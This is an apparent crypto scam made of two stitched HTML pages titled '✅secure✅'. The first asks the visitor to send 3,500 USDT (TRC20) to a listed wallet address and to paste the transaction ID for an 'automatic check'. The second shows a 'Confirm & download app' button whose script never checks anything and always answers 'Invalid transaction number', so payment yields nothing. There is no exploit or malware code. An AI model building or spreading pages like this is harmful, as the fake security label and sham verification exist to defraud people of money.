<!DOCTYPE html>
<html>
<title>✅secure✅</title>

<body>
<style>
body{
  font-family: Helvetica, sans-serif;
  text-align: center;
  padding-top: 20px;
}
h1{margin-bottom: 50px;}
h1 span{font-size: 15px; font-weight: normal;}
section{
/*   margin-top: 30px; */
}
input{
  text-align: center;
  padding: 10px 0;
  border: 1px solid #e5e5e5;
  margin-top: 12px;
  box-shadow: none;
  transition: all 0.2s;
}
input:focus{
  outline: none;
-webkit-box-shadow: 0px 0px 17px -5px rgba(79,79,79,0.65);
-moz-box-shadow: 0px 0px 17px -5px rgba(79,79,79,0.65);
box-shadow: 0px 0px 17px -5px rgba(79,79,79,0.65);
}
button{
  border: none;
  background: #43acd9;
  color: #FFF;
  line-height: 37px;
  padding: 0 20px;
  position: relative;
  margin-left: 3px;
}
button:focus{
  outline: none;
}
button:after{
  content: "Copie réussi";
  opacity: 0;
  position: absolute;
  top: 0;
  right: 0px;
  padding: 0 10px;
  background: #84d72c;
  transition: all 2s;
  -webkit-transition: all 0.5s;
}
button.copied:after{
  right: -100px;
  opacity: 1;
}
textarea{
  display: block;
  margin: auto;
  padding: 10px;
  text-align: center;
  font-family: inherit;
  resize: none;
  margin-top: 12px;
  width: 235px;
  height: 50px;
}
</style>
</body>


<p><strong>«USDT TETHER *TRC20 NETWORK* 3500 USDT »</strong></p>
<section>
  <input type="text" id="codemob" onmouseover="this.select();this.focus()" value="3500" readonly>
  <button data-copytarget="#codemob">copy amount</button>
</section>
<section>
  <input type="text" id="codedesktop" onmouseover="this.select();this.focus()" value="THmQLgemVx1394yYxMQfycXirzPtEygK4x



" readonly>
  <button data-copytarget="#codedesktop">copy addres</button>
</section>

<textarea placeholder="Enter usdt tether trc20 txıd number automatic check.. ***********************************************" onfocus="this.value = ''"></textarea>
<script>
(function() {
	'use strict';
  
  // click events
  document.body.addEventListener('click', copy, true);
  
	// event handler
	function copy(e) {
    // find target element
    var 
      t = e.target,
      c = t.dataset.copytarget,
      inp = (c ? document.querySelector(c) : null);
    
    // is element selectable?
    if (inp && inp.select) {
      
      // select text
      inp.select();

      try {
        // copy text
        document.execCommand('copy');
        inp.focus();
        
        // copied animation
        t.classList.add('copied');
        setTimeout(function() { t.classList.remove('copied'); }, 2500);
      }
      catch (err) {
        alert('Une erreur est survenue. Faites un CTRL+C pour copier le code promo ou clique droit puis "copier".');
      }
    }
  }
})();
</script>
</html>


<!DOCTYPE html>
<html>
<!DOCTYPE html>
<html>
<title>✅secure✅</title>

<body>
<style>
.btn {
  border: 1px solid #c00;
  padding: 8px 10px;
  font-size: 16px;
}
.btn.btn-delete {
  color: white;
  background-color: #f33;
}

</style>

</body>
<button class="btn btn-delete" data-confirm="Are you sure?">Confirm & download app</button>

<script>
var btn = document.querySelector('.btn');

btn.addEventListener('click', function(){
  if(btn.confirmed) {
    clearTimeout(btn.timer);
    btn.textContent = 'Confirm & download app';
    btn.confirmed = false;
    alert('Invalid transaction number ...Enter the valid transaction number..!');
    
  } else {
    
    btn.textContent = btn.dataset.confirm;
    btn.confirmed = true;
    btn.timer = setTimeout(function(){
      btn.confirmed = false;
      btn.textContent = 'Confirm & download app';
    }, 5000);
  }
  
  
});
</script>
</html>
